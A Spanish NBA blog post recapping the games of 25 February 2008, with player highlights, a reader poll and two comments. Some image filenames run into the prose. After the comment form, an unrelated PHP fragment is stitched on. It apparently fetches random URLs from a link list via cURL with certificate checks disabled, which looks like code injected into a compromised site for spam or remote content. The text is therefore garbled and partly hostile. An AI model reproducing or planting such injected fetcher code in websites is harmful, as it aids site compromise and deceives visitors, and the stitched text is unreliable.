La crónica (25/02/08)

26 de February de 2008 por MagicJohnson32

La noche en la NBA dejó seis partidos, con tanteos bastante bajos y victorias de los favoritos… con una excepción: la derrota de los Hornets ante los Wizards gracias a este buzzer beater de DeShawn Stevenson.

La crónica:

Los Raptors se impusieron en Indianapolis pese al, posiblemente, peor partido de José Calderón en lo que va de temporada. Bosh y Delfino (23 puntos con 6 de 7 en triples del argentino) fueron suficiente para superar por 102-98 a los depresivos Pacers, en los que destacaron Granger, Murphy y Daniels. La mayor sorpresa de la jornada se produjo en New Orleans, donde los Hornets se vieron sorprendidos por los Wizards, que ganaron 103-100 con un triple sobre la bocina de Stevenson. El escolta culminaba así una gran actuación, con 33 puntos, questevensonbuzzer compensó el mal día de Jamison y las bajas de Arenas y Butler. Chris Paul brilló pero no pudo evitar la tercera derrota seguida de los Hornets, que de esta manera caen a la quinta plaza de la ultracompetitiva Conferencia Oeste al verse superados por los Spurs.

Los texanos firmaron un partido histórico, a su manera. Ante Atlanta, los de Popovich realizaron el peor primer cuarto en la historia de la franquicia, con sólo 5 puntos anotados. Los Hawks no fueron capaces de aprovecharlo y acabaron cayendo ante los vigentes campeones por 74-89, con Duncan como referente y buenas aportaciones del banquillo. Por los Hawks destacó más el 3 de 23 que hicieron entre Bibby y Josh jkidddirkclapSmith que las correctas actuaciones de Johnson, Horford o Pachulia. Sin abandonar Texas, Jason Kidd debutaba ante su nueva (vieja) afición y los Mavs salieron motivados frente a los Bulls, que encajaron un 14-29 en el primer cuarto y fueron siempre a remolque para acabar perdieron 94-102. Kidd rondó el triple doble con 11-9-8 pero Nowitzki volvió a ser el mejor con 29 puntos y 10 rebotes, bien acompañado por Stackhouse (23 puntos en 23 minutos). Por los de Chicago, todo el quinteto estuvo decepcionante y lo mejor llegó desde el banquillo por parte de Gordon, Gooden y Hughes.jrsmithmisses

Los Nuggets necesitan acabar urgentemente con la racha de 3 derrotas que acumulan si no quieren verse lejos de los Playoffs. Ayer cayeron por 98-93 ante unos Pistons plenamente recuperados después del pequeño bache que atravesaron a su regreso del All-Star Weekend. El trío Billups-Hamilton-Prince sumó 60 puntos (20 cada uno) y 23 asistencias, bien secundados por McDyess, con 16 puntos y 13 rebotes. Iverson y Melo fueron los mejores de los Nuggets, que tuvieron la oportunidad de empatar con 3 tiros libres de JR Smith a 6 segundos para el final. Sin embargo Smith falló 2 de sus lanzamientos y los visitantes sellaron una nueva victoria.

Los Celtics no permitieron que los Pistons recortasen diferencias y se impusieron con claridad a los Clippers, que volvieron a tener las bajas de Cassell y Kaman. Boston no necesitó exprimir el talento de su Big Three y ninguno de sus jugadores anotó más de 17 puntos, mientras que los Clippers apenas encontraron vías para anotar y encajaron, por 104-76, la 35ª derrota de la temporada.

Nuestro MVP: Destacamos hoy a los dos jugadores más determinantes de los Mavericks. 29 puntos, 10 rebotes para Dirk Nowitzki y 11 puntos, 9 rebotes y 8 asistencias para Jason Kidd.

El rookie: Sólo Al Horford ha tenido una actuación destacada con otro doble-doble: 12 puntos y 13 rebotes para él.delfinoclaps

La sorpresa: Carlos Delfino ha anotado 6 triples de 7 intentos y se ha convertido en el jugador más determinante en la victoria de los Raptors. Pero, para increíble, los 33 puntos de DeShawn Stevenson con triple en el último segundo para dar el triunfo a los Wizards.

La decepción: Horrible partido de Calderón (sin asistencias en 24 minutos) que empieza a notar en el cogote el aliento de TJ Ford. Destacamos también el 1 de 11 en tiros de Mike Bibby y el 2 de 12 con 8 pérdidas de balón de Josh Smith. En realidad deberíamos incluir a todo el quinteto de Atlanta porque juntos sólo fueron capaces de anotar 13 tiros de 55 intentos. Tampoco estuvieron mejor Camby, con 1 de 8 en tiros, Jamison con 3 de 16, o Hinrich, que se quedó sin anotar y fue expulsado en el segundo cuarto al recibir 2 técnicas.

Encuesta: Seguimos con nuestras encuestas Oscar Special Edition, ésta en homenaje a Bardem. ¿Quién es el mejor actor secundario de la liga?

A) Manu Ginóbili (de Tim Duncan)

B) Pau Gasol (de Kobe Bryant)

C) Amare Stoudemire (de Steve Nash)

D) Jason Kidd (de Dirk Nowitzki)

E) Paul Pierce (de Kevin Garnett)

F) Yao Ming (de Tracy McGrady, o viceversa)

G) Carlos Boozer (de Deron Williams)

H) Allen Iverson (de Carmelo Anthony, o viceversa)

Comenta

2 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    yo votaria la C, aunke 2 jugadores no solo hacen un equipo.

      Citar

  2. Olafur dice:
    #2

    Kobe de Shaq…….ah que esa no esta juas juas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>